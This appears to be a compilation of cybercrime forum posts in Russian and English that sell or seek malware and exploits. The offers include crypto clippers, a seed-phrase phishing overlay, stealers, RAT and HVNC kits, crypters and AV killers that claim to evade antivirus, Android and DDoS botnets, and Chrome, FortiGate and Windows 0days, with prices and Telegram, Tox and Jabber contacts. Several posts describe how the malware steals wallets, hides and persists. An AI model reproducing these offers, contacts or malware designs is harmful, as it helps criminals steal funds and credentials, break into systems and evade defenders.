also text file ( or if u want i can convert to json file ) with gadgets needed and address (for x86 and arm32) [ if u need aarch64 some additional fee needed to pay ]
1 python file as shellcode generator (that can use with 2 cve as payload)
1 python file for version detecting based on CVE-2024-23662
tutorial file for using and sample silver agent payload that use for test
if u needed feel free to contact me
have a nice day
Доброго времени суток, готов представить новый клиппер с предварительной генерацией.
Наш клиппер имеет базу предварительно сгенерированных пар адрес/приватный
ключ для каждой учетной записи.
Во время копирования кошельков на машине пользователя, наш сервер будет
искать похожий на копируемый адрес, найдя который способствует его замене.
Если похожий кошелёк не был найден - используется кошелек предварительно
внесенный вами в базу.
Доработанный на основе #2 версии: https://xss.as/threads/111524/*
Spoiler: Внесение кошельков
Всего на данный момент есть 3 типа из самых популярных криптовалют: BTC(3 вида), TRX, ETH
Spoiler: Скрин работы замены кошельков в логах панели
Панель имеет встроенный билдер , за слив билда из которого на Вирустотал - клиент лишается своей лицензии.
Spoiler: Билдер
Работа по СНГ выключена.
Spoiler: Вход в панель
Панель предоставляется по подписке.
Цена подписки зависит от кол-ва заранее сгенерированных кошельков. Кол-во
кошельков считается как для отдельной криптовалюты, а не их суммарное число,
то-есть если 10.000 кошельков - суммарно будет 50.000
Как не трудно догадаться, от кол-ва предварительно сгенерированных кошельков, зависит шанс замены на похожий адрес, чем больше - тем выше шанс, но и больше нагрузка на наш сервер, что компенсируется стоимостью подписки.
Панель как и сам клиппер будут обновляться, с целью понижения обнаружения АВ
и внесением пущего удобства и улучшения функционала.
В следующем обновлении планируется добавить больше кошельков, планируется
разделить криптовалюты на предварительно генерируемую замену и без нее.
**Отвечу на все вопросы для внесения ясности и для приобретения подписки в своем ТГ: @enjeymaster
Человек который будет использовать клиппер по предварительной договоренности.*
Deal With Escrow Accepted.
Here's how it works:
The user's wallet is opened, and the password is saved for later use.
When the user wants to make a transfer, the code identifies the coin and pastes the corresponding address, sending all the available amount of that coin.
At present, it is coded only for Trust Wallet. You can read the code to understand the logic and adapt it to other wallets, or I can code it for you if you prefer.
Demo : https://streamable.com/8aj19h
Support Android 9-15
Ищу кто напишет или у кого то есть готовый продукт - Я готов купить ! Нужен софт который рассылает пыль и автоматически генерирует коши похожие первые символы и поледние на кошельки жертвы
Цена не окончательная - рассмотрю все предложения ! Пишите срау в телегу по цене готов договариваться индивидуально ! от 3к usd ! Телега - agueera
Исходный код включает в себя:
Клиентская часть. Написана на Rust, нет зависимостей, вес конечного билда
около 200 Кб, включает в себя:
HVNC полноценный видеостриминг псевдо-десктопа с возможностью управления
запущенными приложениями
CreateDesktop
- вместо этого используется метод из конкурсной статьи с эксплоитаStealer собирает профили (пароли, куки, формы, историю) с chromium-based и gecko-based браузеров:
Серверная чать (бэкэнд) - написан на Rust + Postgresql:
ViewerGate
/ClientGate
- веб-сокет гейты для упраления клиентскими машинами из веб-вьювераMainGate
- регистрация ботов, принятие и обработка логовПанель управления (фронтэнд) - написан на vue3:
Вьювер написан на раст, скомпилирован в WASM:
Нюансы :
Скриншоты:
You must have at least 1 message(s) to view the content.
Видео-демонстрация:
You must have at least 1 message(s) to view the content.
Продажа осуществляется в одни руки, гарант приветствуется.
Любые доработки обсуждаются отдельно.
Цена: 15к$
Private Protector
Why we are different?
(Your 's or our's virtual machines with any Antivirus or Dyncheck test for scantime/runtime test)
**Scantime proof(0/31)
<http://[B]https://avcheck.net/id/d4W5bBn5a6FB [/B]>
Runtime proof (1/24)
https://scanner.to/result/3pP4zk3Z6dRf
VIDEO PROOF**
**I 'm providing runtime video proof using private protector + RAT. Test is performed with all default settings on + network.
In these tests, WINDOWS 10 fully updated as well all antivirus engines.
If need more proof I invite any serious customer to do a test on my virtual machines or his virtual machines.
Runtime tests are performed on these antivirus lists.
Windows DEFENDER + CLOUD, ESET Smart Security, 360 internet security, Avira + Cloud, Bitdefender bypass, Bullguard Bypass, Kaspersky Bypass, Dr Web bypass, AVG Bypass, Avast Bypass, Mcafee internet security, Norton Bypass, and Sophos bypass. (If there is more important av I can add later on )
Windows 10 Defender + Cloud Bypass
**
**ESET Smart Security Bypass
**
**360 internet security Bypass
**
**Avira + Cloud bypass
**
**Bitdefender bypass
**
**Bullguard Bypass
**
**Kaspersky Bypass
**
**Dr. Web bypass
**
**AVG Bypass
**
**Avast Bypass
**
**Mcafee internet security
This video is only for educational purposes.
www.youtube.com
**
**Norton Bypass
This video is only for educational purposes.
www.youtube.com
**
**Sophos bypass
This video is only for educational purposes.
www.youtube.com
**
**Another proof for serious buyers
-We accept crypting and scanning your files on Dyncheck for scantime/runtime test before you order to verify our runtime results.
Features**
Price
**-2500 $ per month 1 shared stub at time - cleaning time 24-48 hr- limited
time only 4 slots opened
-6000 $ per month 1 stub at time - cleaning time 24 hr
!!! Custom private stub's deals (Premium packages from 12k to 20k available
now) -Instant cleaning or up to 4-6 hr
This include:
Unlimited cleaning per subscription term**
- Guarantor is accepted
- We accept payments in BTC or any other cryptocurrency +3 % fee to cover
exchange fees.
Contact
-imcomplexed@xmpp.jp
-imcomplexed@exploit.im
-Telegram username: https://t.me/complexedcrypt
Terms
-No sharing or crypting for others.
-No tampering
-No ransom crypting allowed
-I reserve the rights to deny any service to any customer
-All sales are final
-We reserve the right to update, change or replace any part of these Terms of Servi
Имеете свой стиллер и хотите получать на 10-15% больше криптокошельков (в виде
расширений)? Моё решение подойдёт Вам. Насколько я знаю - ни один паблик
стиллер не умеет работать с расширениями фаерфокса.
PoC написан на Rust, представляет из себя desktop-приложение с консольным
интерфейсом. В текущей реализации декодинг расширений происходит полностью на
клиентской части, но желательно реализовать на сервере, дабы не тащить на
таргет-машину зависимости (sqlite3, snappy, INI-parser).
Будет продано 2 копии исходников, работаем через гаранта. Если есть репутация
Hidden content for authorized users.
https://temp.sh/AqybP/Re8YsXYFR3.zip
](https://anonfiles.com/d3Eek9o0z6/Re8YsXYFR3_zip)
anonfiles.com
pass: !aDec(2pI6VtY7V(4%R[O0YDX_kGVnIs
ТОП
КРИПТ ВАШИХ ФАЙЛОВ ПОД
ПРОЛИВЫ
Обходим Windows Defender на всех гео (runtime, scantime, cloud)
Криптуем только .exe и .scr
Поддержка .Net & Native файлов / 64x и 86x
Крипт подходит под 99.9% малварей
На каждый стаб ограниченное кол-во людей, FUD сохраняется максимально долго
—————————————————————————
**Стоимость
50$/крипт (BTC, USDT TRC20, ETH)**
Дополнительно можем:
Есть возможность подготовить личный стаб под вашу малварь от 250$
ТЕЛЕГРАМ ДЛЯ
СВЯЗИ:@Crypt_Undercover(Clickable)
Tox:
B5AFA2CE2D2C527A415F427878DA125695260FEC9EA9B2AC5356FC23E12A7E44592DAC8C72E9
Онлайн 20+ часов в сутки!
—————————————————————————
TOP
CRYPT YOUR FILES UNDER
SHEDDING
Bypass Windows Defender on all geos (runtime, scantime, cloud)
Crypt only .exe and .scr files
Support .Net & Native files / 64x and 86x
Crypt fits 99.9% of malware
Limited number of people per stub, FUD is kept as long as possible.
—————————————————————————
**Cost
Additionally we can:
It is possible to prepare a personal stub for your malware from 250$.
TELEGRAM FOR
COMMUNICATION:@Crypt_Undercover(Clickable)
Tox:
B5AFA2CE2D2C527A415F427878DA125695260FEC9EA9B2AC5356FC23E12A7E44592DAC8C72E9
Online 20+ hours a day!
Seed Phrase seeker
Представляю вашему вниманию софт для кражи seed фраз от аппаратных/десктопных кошельков, а также для расширений. Софт постоянно мониторит окна таких кошельков: Metamask, Ledger, Trezor, Exodus, Atomic, когда появляется нужное окно - создается фейковое окно поверх оригинального, где требуется ввести пароль и/или сид фразу.
Софт написан на c++, вес файла ~200кб, 32bit
Админка написана на express.js
Смогу добавить кошелек который вам нужен или любое другое фейковое окно.
Пример фейк окна:
Spoiler: Скрины
Скриншоты админки:
Spoiler: Скрины
Цена: 5к$/месяц.
Перед покупкой обязательна верификация через форум. Согласен на гаранта.
За контактами в пм.
Продам RedLine ЛТ до 2030 года LOG PASS + последнюю версию панели. Цена
обусловлена отсутствием других персонажей на вашей панели, передаю Вам и никто
больше пользоваться кроме вас не будет. Лежит без дела
Цена 100$
Официальная цена 600$
Hello,
Private Crypter Builder In your hands, do as many Encryptions you want with your hands under 4 clicks only.
Stubs
in C, fully polymorphic
Bypass
WD & Cloud FUD Runtime
0-3/21
Results Scanner
Private
Stubs come with Builder
Random
Stub sizes from 2Mb to 50Mb
Only
you own the Stubs not shared
Startup
Option can be added
Undetected
Startup %100
Antis
can be added to Stubs
1- You will get builder + Stubs
2- With each Stub you can generate multi crypts, each crypt will be unique.
3- You don't have to worry about short detections because Stubs are owned only
by you.
4- You can select your desired Icons.
5- Builder come in Console form.
Detection results change according to your malware kind & its behavior.
⚛Packages:
Builder
Support 32Bit EXE, malwares such as Darkgate, Rhada, Vidar, Remcos, Darkvision, LummaC, Xehook, ACR, RisePro..etc
Kindly write in PM for any questions
Thanks
Spoiler: Закрыто на депозит/Closed for deposit
Hi everyone,
APK FUD SERVICE
1 APK FUD - 30$
10 APK FUD - 250$
contact dm or illegalin@jabber.cz
RMS LOADER x3: Полный Контроль и Безграничные Возможности!
Готовы ли вы к полному контролю над удаленным компьютером? RMS LOADER x3 приносит вам все, что вам нужно для достижения этой цели. Узнайте больше о наших уникальных функциях:
Удаленный Доступ: Получите полный доступ к жертве компьютера без необходимости администраторских прав. Наслаждайтесь полной свободой!
🛡 Root RDP Патч: Наша сборка включает в себя специальный RDP патч, который дает вам высшие привилегии для безупречной работы.
[CAM2.0] Наблюдение: Онлайн-наблюдение за целью никогда не было таким простым! Следите за всем, что происходит в реальном времени.
Микро Прослушка: Встроенная функция микро прослушки позволяет вам слушать все разговоры на целевом компьютере.
🛠 Пожизненное Сопровождение: Мы всегда рядом, готовы помочь вам с любыми вопросами. Вам доступны апдейты, дополнительные запросы и идеи для доработки!
Опытный Кодер: Наша команда имеет опыт в Delphi, обеспечивая надежность и высокую производительность сборки RMS LOADER x3.
Не упустите шанс получить полный контроль и доступ к всем ресурсам целевого компьютера. RMS LOADER x3 - ваш ключ к бесконечным возможностям!
Свяжитесь с нами сейчас, чтобы узнать больше и начать использовать RMS LOADER x3 уже сегодня![/B]
Перед покупкой связаться
↨ не уверены ↨
Только Гарант форум
Рандом % скидки %
Лицензия навсегда
HWID 50$
В ходе проюза за положительный отзыв настройка " сервера" персонально
(Бесплатно)
это одно из преимуществ
Все данные хранятся только у вас - на вашей ответственности
После покупки предоставляется пошаговые действия
VIRUSTOTAL
→←
Наши ТЕМЫ можно найти на других форумах
Не засоряйте комменты вопросы цены [PM]
либо[TG]**- отвечу быстрее
Используйте **ОТЗЫВЫтолько здесь
Репутация важна везде
**1. Обход окна UAC при запуске файла, повышает себя до привилегий администратора.
2. Inject dll библиотеки в процесс explorer.exe (1-ое соединение от имени пользователя).
3. Автозагрузка Inject dll из планировщика заданий.
4. Установка службы svchost.exe (2-ое соединение от имени системы).
5. Возможность загрузить файл с сайта или с ПК и запустить с правами пользователя и привилегиями администратора, а так же от имени системы.
6. Возможность исполнить команду cmd на стороне клиента, с привилегиями администратора в скрытом режиме.
7. RMS ver 6.7.0.2 Server Client + HRDP. Один процесс RMS.
8. Автозагрузка RMS из планировщика заданий.
9. Все строковые типы данных, такие как IP-адрес сервера,
записываются в заглушку в зашифрованном виде, и уже во время запуска файла,
эти данные расшифровываются и устанавливается соединение с нашим сервером.10. Скрывает атрибутами директории и наши файлы.
11. Вес стаба: 289 КБ**
Click to expand...
Selling Chrome Sandbox Escape RCE in chrome:
Info:
Tested on: 126.0.6478.126, 126.0.6478.127
Operating System: Windows (Versions: 21H1, 21H2)
Price: 1,000,000 $ Monero & BTC
Session: 057f835a6e04080258512d33cb4f02b80cf64ab1cb9ac8bda69495bcc3892f1872
Note: Not replying without PoF (Proof of funds)
Dealing with MM/guarantor.
Im just a broker.
-----------------------------------------------------------------------
Продам Chrome Sandbox Escape RCE в хроме:
Информация:
Протестировано на: 126.0.6478.126, 126.0.6478.127
Операционная система: Windows (версии: 21H1, 21H2)
Цена: 1 000 000 $ Monero & BTC
Сеанс: 057f835a6e04080258512d33cb4f02b80cf64ab1cb9ac8bda69495bcc3892f1872
Примечание : Не отвечает без PoF (Подтверждение средств)
Работа с ММ / гарант
Я всего лишь брокер.
All stubs unique, rebuild after new exe. Cleaning stubs every day.
Крипт подходит для дропера или лоадера, или прямой заливки смотря что брать.
_Detects based on your payload(runtime). Рантайм детекты обычно зависят от софта, в среднем 2-5 на scanner.to.
About cloud I don't give 100% about it because malware have signatures what be in memory or other.
Есть возможность замены файлов если детекты набежали._
**Scantime (0-2) depends on stub. Скантайм детект зависит от выбранного вами стаба.
Stubs:
In features: vm checks(optional).
Zip with bypass smart screen - 75$.
only .exe:**
Private - 90$ / avcheck should be fud.
Semi -private 40$ / avcheck 0 - 2.
Контакты / Contacts: t.me/UwuEncrypt
Spoiler: Закрыто на депозит
Greetings all !
I present to you a Chinese internal botnet for android .
Me and my Chinese friends have created a botnet using more than 5 exploits for android . So far only tests are available .
Spoiler: A few screenshots of panel
Spoiler: VNC + black screen
THE TESTS ARE FREE AND AVAILABLE TO EVERYONE
(I have the right to refuse you if your account was recently created or has no
activity. )
Доброго времени суток ! Команда из 10 опытных отработчиков хочет перейти с логов на андроид ботов, посему ищет актуальный, рабочий, можно не дешевый малварь под Андроид в аренду. Просьба людей которые захотят толкнуть мне не рабочий софт с соседних веток не писать !!! Перебрал этих софтов штук 10, почти каждый в глаза знаю.
Что мы ищем:
1)Рабочий и актуальный софт(Андроид ботнет), с рабочими инъекциями, VNC,
перехватом сообщений и так далее.
2) Ваш софт должен быть заточен на отработку командой.
3)Дропер для 13.00+ версий Андроид
4)Код не покупаем !! Мы не кодеры, нам сразу нужна рабочая панель и
возможность самим создавать билд.
Что мы имеем:
1)Траф - есть микс, но можем точечно под страну сделать
2)Свои приемки, дропы и наработки по различным сервисам по всему миру, а так
же сим свап под юсу.
Кроме фикса за месяц готовы сверху обсудить %.
Работу начнем только после теста, перед тестом заливаем гаранта, условия
обсуждаемы.
Good time of the day! A team of 10 experienced developers wants to transition from logs to Android bots, hence we are looking for a current, functional, albeit not necessarily cheap malware for Android for rent. Please, people who want to pitch me non-working software from adjacent branches, don't write! I've tried about 10 of these software, I know almost every one of them by heart.
What we are looking for:
What we have:
In addition to the fixed price per month, we are ready to discuss a percentage
on top.
We will only start work after the test, before the test we upload a guarantor,
the conditions are negotiable.
RU:
![](/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FV3YcfgS%2Festk-
crypt-2.png&hash=2fe06335a4ff7b5caf1bacd7b26beaea)
Запрещен слив билда на ВТ.
Проверка исключительно на таких сервисах как : AntiScan, CheckZilla, AvCheck и
др.
Выдача билда строго 0-2/26
Телеграм: https://t.me/estktalent
Канал: https://t.me/estkcrypt
EN:
![](/proxy.php?image=https%3A%2F%2Fi.ibb.co%2F1vQsJfp%2Festk-
crypt-3.png&hash=9abfd9322771749e8c9b087d522cda48)
Greetings, I present my file encryption service
It is forbidden to drain the build on VT.
Checking exclusively on such services as: AntiScan, CheckZilla, AvCheck, etc.
Build output is strictly 0-2/26
Telegram : https://t.me/estktalent
Channel : https://t.me/estktcrypt
Tired of using crypters that get detected? Say hello to the ultimate AV Killer!
Key Features:
_**UAC Bypass
Persistence
SmartScreen Bypass
DLL Sideloading
Disables All Major Antivirus (AV):
Windows Defender
Avast
AVG**_
**_ESET
360 Total Security Chinees + English
To Buy EDR killer Plz Contact Me on Dm or TG_**
Bypasses & Kills AV Processes with Kernel Exploits
_**Pricing:
1 Build: $500
5 Builds: $1,000**_
**_10 Builds: $1,500
Secure your builds today! DM for more details or inquiries.
Auto Buy Shop: _**Anonkiller.Net
_Tor Link:
anonki7jrt65cwp2xept2mebwvpm53frlxxazaomotci6kjid6jwhryd.onion
Telegram: _t.me/Mranoncrypters
Tox:
2DE7695448BBDFFE795BEB7C76A3078BF3CF3A4FB793EF577A2472EE229DB174420137694FF6
Должен поддерживать полностью работу со всеми приложениями и браузерами реализация VNC в виде static lib без сторонних dll-зависимостей. язык C или C++.
Контакты пм использую только жаббер с отр или пгп
куплю исходники стиллера
предложения в лс или в тг - @obnalcardes
единственное предпочтение - расшифровка куков с нового гугла.
бюджет 1к$
работаю через гаранта форума
Hi,
I'm looking to buy some tools,
**ONLY
LASTEST
VERSIONS!
Nighthawk v0.3
Bruteratel v2.0
**Shellterpro plus v10
ONLYLASTEST** VERSIONS!******
Hi,
I'm looking for any 0day or 1day for FortiGate devices.
That should pre-auth and achieve RCE.
deal steps:
no script kiddie please!
Авто-гарант сервисhttps://xss.is/help/escrow
Click to expand...
Продам исходники дроппера для chromium браузеров(по умолчанию стоят chrome, brave, edge, opera, но можно добавить любой другой). Проект написан на c++, вес билда ~ 200kb, само расширение вшивается в выходной exe файл. При установке расширение получает права к файловой системе, благодаря чему расширение может читать абсолютно все все файлы на всех дисках. Также расширение работает в браузере, когда он запущен в инкогнито режиме. Установленное расширение не видно в списке расширений(там где открывается popup окно расширения) в случае если расширение не имеет popup страницы. После установки дроппер самоудаляется, а расширение получает закреп и продолжает работать после перезагрузки системы. Рантайм дроппера неплохой, статика фуд, windows defender fud
Цена: 5.000$
Писать в лс. Возможна сделка через гаранта.
We have several pieces of private software and are in search of motivated
professional teams.
Everything that you expect from a stealer is present and many more things!
We will crypt everything to the highest and cleanest levels!
there are 2 options
A: You bring Downloads/traffick and our team will monetize the victims for you
!
B: You farm and monetize your own downloads and we agree on a %
The products are NOT for SALE or RENT. We are only interested in profit share
Write to the PM for further information and contacts .
Screenshots:
Мой ежемесячный доход составляет от 50k до 250k в зависимости от удачи. Мне нужен партнер, который может предоставить HVNC или HRDP Private. Я работаю по схеме 7-3%. Кроме того, я могу предоставить несколько методов, чтобы ваш вирус не был обнаружен в течение длительного времени, если вы хороший кодер, возможно, даже в течение месяца вам не придется беспокоиться о шифровке файла. Можете написать мне для обсуждения деталей.
Hi guys!
I'm looking for working exploit cve-2024-23113, ready to buy!
ping me on tox!
Троян с функцией кейлоггинга , записи буфера обмена , сбора криптокошельков ,
Bitcoin , Ethereum клиппер
Написан на Си. Вес билда около 160 кб
Есть самораспространение по USB .
Уже установлен на хостинг , есть статистика по странам
A Trojan with keylogging functionality, clipboard recording, and collection of cryptocurrency wallets, Bitcoin, Ethereum clipper. Written in C. The build size is about 160 KB. It has self-propagation via USB. It is already installed on hosting, and there is statistics by country.
$100 Lifetime
Куплю 0day Win LPE/RCE, на последние обновления
Цена от 150к$
Строго через гаранта со всеми проверками
Buy 0day Win LPE/RCE on last updates,
price start from 150k$
Куплю исходники Стиллера
Бюджет 1круб /12$
исходники не должны быть в паблике
Стиллер должен быть написан на C++ и иметь панель
dyncheck.com - динамический рантайм чекер файлов** .
DynCheck.com - единственный динамический чекер добавил неограниченные бесплатные статик сканы. Теперь можно проверять Ваши exe, pdf, docx, итд на scantime совершенно бесплатно на 36 антивирях.
Давите на папку Scantime на странице https://dyncheck.com/tarifs и выбирайте тариф Free+.**
Проверка включает в себя рантайм, скантайм и тест работоспособности файлов.*
Проверка файлов происходит с полноценным запуском на системах в риалтайме
с работающим антивирусным ПО (класса Internet Security) и с последующим
выводом результатов обнаружений.
Результатом такой проверки является отчет с отображением скриншотов и
состояний рабочего стола
с тестовых машин на различных промежутках времени в удобном информативном
виде.
**Доступные для рантайм скана антивирусы (23):
1. 360 Total Security Essential
2. AVG Internet Security
3. AhnLab V3 Light
4. Avast Internet Security
5. Avira Internet Security
6. BitDefender Total Security
7. BullGuard Internet Security
8. Comodo Internet Security
9. DrWeb Total Security
10. Emsisoft Anti-Malware
11. Eset Smart Security
12. F-Secure Internet Security
13. Fortinet Smart Security
14. Kaspersky Internet Security
15. Malwarebytes Anti-Malware
16. McAfee Internet Security
17. Norton Internet Security
18. Panda Global Protection
19. Sophos Anti-Virus
20. Symantec Endpoint Security 14
21. Trend Micro Internet Security
22. Webroot SecureAnywhere
23. Windows Defender
Ожидаемые (3)**:
**24. Cylance PROTECT
25. Sentinel One
26. CrowdStrike Falcon
Пример отчета с результатом теста в рантайме: (все скриншоты кликабельны)**
Доступные для статик скана антивирусы (36):
**dyncheck.com это:
● Возможность проверки Ваших файлов на различные виды обнаружений:
статические, динамические, поведенческие, облачные и детекты в памяти.
● Возможность проверки различных типов файлов : .exe, .dll, .bat, .doc, .docx,
.xls, .xlsx, .pdf, .js, .jse, .vbs, .ps1 и .hta и многих других.
● Возможность проверки полного цикла для файлов с макросами .doc, .docx, .xls,
.xlsx, а так же JS и PDF. (Под полным циклом понимается запуск файла,
автоматическое соглашение на выполнение макроса и все дальнейшие действия в
результате исполнения макроса).
● Возможность увеличения времени проверки файла до: 120 сек, 180 сек, 240 сек.
● Возможность фильтрации трафика кроме заданных в вайтлисте IP адресов.
● Возможность проверки dll файлов через запуск с помощью rundll32.
● Возможность опционально выбрать только необходимые Вам антивирусы и
оплачивать только за проверку на них.
● Возможность проверять Ваши файлы с выключенным\включенным интернетом или
использовать функцию вайтлистинга указанных IP или доменов, блокируя весь
остальной трафик. *
● Возможность установить проверяемому файлу NTFS потока ZoneIdentify. **
● Возможность получать логи DebugView с тестовых машин в отчете. ***
● Возможность настроить проверку Ваших файлов через наш удобный API интерфейс.
● Возможность демонстрации Ваших отчетов по ссылке другим людям, а так же
возможность сохранять и скачивать отчеты в PDF или JPG.
● Информативные отчеты с разворачивающимися скриншотами обнаружений
антивирусным ПО и скриншотов рабочего стола с тестовых машин.
● Недетектируемое тестовое окружение : наши тестовые машины проходят тесты
Pafish.
● Имитация обычной пользовательской системы : на тестовых машинах установлен
различный софт (Microsoft Office,
Chrome, Firefox, WinRar, Notepad++, Adobe Reader, Adobe Flash Activex, Java
SE, Net Framework, VC runtime 2008-2015), что
помогает не выделять тестовые машины от реальных пользовательских систем.
● Имитация обычных пользовательских действий : продуманная система движения
курсором, нажатием клавиш, система рандомных окон и процессов.
● Имитация обычных пользовательских файлов : на тестовых машинах в
пользовательских директориях разложены различные файлы (doc, docx, xls, xlsx,
rtf, png, jpg, png, rar, zip, dll, exe, txt, mp3 и др.), что помогает вызывать
реакцию вирусов семейства криптолокеров и как результат создается триггер для
детекта антивирусным ПО.
● Гибкие тарифные планы: возможность выбора между разовой проверкой, дневным,
недельным, месячным или VIP тарифом.
● Возможность автоматизированного пополнения Вашего баланса через Bitcoin
через наш мерчант, с автоматическим зачислением после первого подтверждения.
● Удобная, информативная и подробная статистика истории проверок.
● Реферальная программа с зачислением до 30% от стоимости тарифа, при покупке
тарифа рефералом, на ваш счет.
● Безопасное (изолированное) автоматическое обновление антивирусных баз каждые
4 часа + статистика обновлений.**
Зарегистрировать аккаунт на dyncheck.com
Текущие цены на скантайм и рантайм планы - на сайтеhttps://dyncheck.com/tarifs.
Сдается в аренду нерезидент лоадер
При запуске скачивает Ваш файл с веба и запускает в памяти, поддерживает x32 и x64
Опционально можно добавить:
-- Aвтозагрузка, скрытие в файловой системе
-- Поднятие прав через запрос или UAC bypass (паблик)
-- Обход Windows Defender, добавление в исключения
-- Отстук в телеграмм
Hi,
Introducing my revolutionary PDF landing pages, which combine stunning design with guaranteed mailbox delivery. I guarantee that every message you send reaches its intended destination! even if you send it thousands of times, no filter no block no browser alert and bypass Email security.
I do provide demo and examples upon your desire.
Prices:
$250 per 100 PDF Builds
1000$ on monthly bases
(daily link updates and pdf builds)
Contact in PM or TG
US/filescanjob/h5awyne8fk)
virusscan.jotti.org
analysis/YjRjNTI5YWE3MjQ3MTQxYTEyNjgyODRmNmExYTAyMWM6MTcxMzYzODkzOA==)
VirusTotal
![www.virustotal.com](/proxy.php?image=https%3A%2F%2Fwww.virustotal.com%2Fgui%2Ffile- analysis%2FYjRjNTI5YWE3MjQ3MTQxYTEyNjgyODRmNmExYTAyMWM6MTcxMzYzODkzOA%3D%3D%2Fimages%2Ffavicon.svg&hash=f691526eb7ccb98fc5be51b183a07719&return_error=1) www.virustotal.com
сделаю крипт + склейку WORD,PDF.EXCEL так же с дургими файлами
Крипт 60$
Склейка 200$
Гарант приветсвуется
tox
C5BA6A12CCD52136B45F4C85062F112E2771ED3648349B7A1D9BA6EBAD6FF26D7E922903077A
[RU]
Делаю качественную склейку вашей малвари и легитимного ПО на ваш выбор.
Техническая информация:
Поддерживаю все типы файлов: x64/x86/.NET
AMSI unhook
ETW unhook
Indirect system calls
Antiemulation and antivm
Гарантирую обход windows defender и бесплатно сделаю recrypt в случае детекта
в течении одной недели.
Цена: 80$
Контакты:
jabber: drtinker@exploit.im
telegram: @exe_bind
Forum PM
Ниже представлены видео-демонстрации склейки LummaC2 с легитимным ПО.
[ENG]
I do a high-quality gluing of your malware and legitimate software of your
choice.
Technical information:
I
support all file types: x64/x86/.NET
AMSI unhook
ETW unhook
Indirect system calls
Anti emulation and anti vm
I guarantee to bypass windows defender and do recrypt for free in case of
detection within one week.
Price: $80
Contacts:
jabber: drtinker@exploit.im
telegram: @exe_bind
Forum PM
Below are video demonstrations of gluing LummaC2 with legitimate software.
CPU-Z + LummaC2
Static scan results: https://avcheck.net/id/GRryNUxmAoXr
We are raising privileges in your networks.
release of a new android bot - less then a month old.
high life span on survivability, vnc , inject , crypts.
slot open accepting new partners in new geo. note , I have right to refuse
without explanation
xss guarantor only
for testing period.
Нужен приватный самописный ратник с поддержкой, никакого паблика.
Возьму в аренду или в тимку за %.
Велком в лс.
Всем привет! куплю сносилку AV\EDR
АВ которые нужны: SentielOne,Sophos,Symantec,Eset и так далее
Цена договорная, если вы кодер который только пилит эту штуку могу дать доступ с каждым AV, для того чтоб лучше настроить софт
Цена-договорная
Крипт apk файлов. Цена одного крипта 60$,первым троим предоставлю тестовый крипт за 25$ . //Прошу не загружать файл после криптовки на вирустотал и ему подобным. Перед криптовкой, файл должен быть не склееный.
Welcome, Today I am releasing fully recoded HTTP DDoS BotNet
This newly released HTTP DDoS botnet is a formidable threat, capable of launching devastating attacks against a wide range of targets. Designed to target Windows operating systems from 7 to 11, it employs a diverse arsenal of Layer 7 methods to overwhelm and disrupt its victims.
The Layer 7 techniques include using random hexadecimal values to bypass CAPTCHA checks, sending packets with high byte counts to overload servers, and leveraging a novel approach involving random subdomains.
The botnet also utilizes the HEAD DDoS method, which sends requests without a user-agent or headers, as well as the simplistic yet effective "GET / HTTP/1.1\r\n\r\n" tactic. For added complexity, it can incorporate more extensive header information in its GET requests and even bypass defenses like Google Project Shield and DDoS-Guard.
The botnet's versatility extends to exploiting vulnerabilities in Apache and WordPress XMLRPC, allowing it to bypass typical anti-DDoS measures. Furthermore, it can leverage external tools like codesenberg/bombardier to amplify the attack. By running multiple concurrent threads, this botnet can overwhelm and cripple even the most robust targets.
Complementing its Layer 7 arsenal, the botnet also boasts a range of Layer 4 capabilities. These include opening and closing connections through proxy servers, launching ICMP echo request floods, maintaining persistent connections, and leveraging amplification attacks against protocols like Memcached, NTP, Chargen, and CLDAP. This multifaceted approach ensures that the botnet can adapt to various network environments and bypass diverse defensive measures.
With such a comprehensive set of attack vectors and the ability to target a broad range of Windows systems, this newly released HTTP DDoS botnet poses a significant threat to individuals, organizations, and critical infrastructure alike. Its developers have clearly invested considerable time and resources into creating a formidable tool that can wreak havoc on a global scale.
Target Windows OS 7-11
Web Panel: PHP / CSS
EXE: C# ( C++ Build Soon )
LAYER7 methods:
1. Random HEX
2. Bypass chk_captcha
3. Send HTTP Packet With High Byte
4. A New Method With Random SubDomain
5. HEAD DDos Method
6. Null UserAgent and Headers
7. Only 'GET / HTTP/1.1\r\n\r\n'
8. GET Method with more header
9. Google Project Shield Bypass
10. DDoS-Guard Bypass Beta Version
11. Arvan Cloud Bypass
12. Apache Expliot
13. WP XMLRPC exploit
14. Bypass Normal AntiDDoS
15. Bypass with codesenberg/bombardier
16. Run many threads to kill a target
LAYER4 methods:
1. Open and close connections with proxy
2. Icmp echo request flood (Layer3)
3. Open connection alive with proxy
4. Memcached Amplification
5. NTP Amplification
6. Chargen Amplification
7. Cldap Amplification
Plans Available are as followed
Our Domain: $100 month, BYOC ( Bring your own Clients )
Our Domain + 1,000 Clients: $600 month replenished each month + $200 for
Crypt, No Crypt No Promise on 1k Clients
Plans up to 10,000 Clients
If you own a Cryptor and want your Product Listed Here Message me for testing and I will add.
Rebuilds $30
Ищу человека который способен сделать обход 2фа
Сайт: o2online.de
просит смс код или же код на почту, но после кода на почту бывает просит сразу
код смс.
Моему товарищу уже сделали обход, но он не дает мне не контакт человека кто
сделал ни само ПО.
Цену вижу от 1к $
Сделку проводим через эскроу.
Более подробно рассказать и дать аккаунт для сканирования могу в личке
Telegram: @factr0
TOX
83DE17B0279DE61151177C4D5BFFB2DD7E18AF400818B7C57FFF6D7B852B6432037F20B02F4D
Нахожусь в поисках кодера, который смог бы взяться за переделку кракса. В первую очередь интересует возможность доработки самого apk для поднятия версии СДК. Необходимо сделать билдер, который будет выдавать файл с СДК 31+ сразу после компиляции без каких-либо дополнительных манипуляций. Также есть некоторые пожелания по доработке дроппера.
Никаких предоплат не будет от слова "совсем": работа только через местного гаранта и никак иначе. Цена индивидуальна и зависит от ваших возможностей (пожеланий по переделке много, выше описаны лишь основные). Если у вас есть аналогичный краксу приватный продукт, который уже включает в себя все те же функции со свежей сдк, его также рассмотрел бы к покупке (аренда не интересует).
Spoiler: Внесите депозит
Продается в одни руки исходный код стиллера на MacOS. Написан на Objective С. Поддержка ARM архитектуры. Помимо основного функционала сборки паролей/кукис/крипто кошельков и расширений, собирает Notes. Все вопросы в лс форума/TOX. Продажа через гарант XSS. Воздух и швыры всех мастей мимо.
For sale in one hands source code of stealer on macOS. Written in Objective C. Supports ARM architecture. In addition to the main functionality of stealing passwords/cookies/crypto wallets and extensions, he stealing Notes. Questions in PM/TOX. Sale via XSS escrow. Scammers, don't even try.
Spoiler: Закрыто на депозит: $500
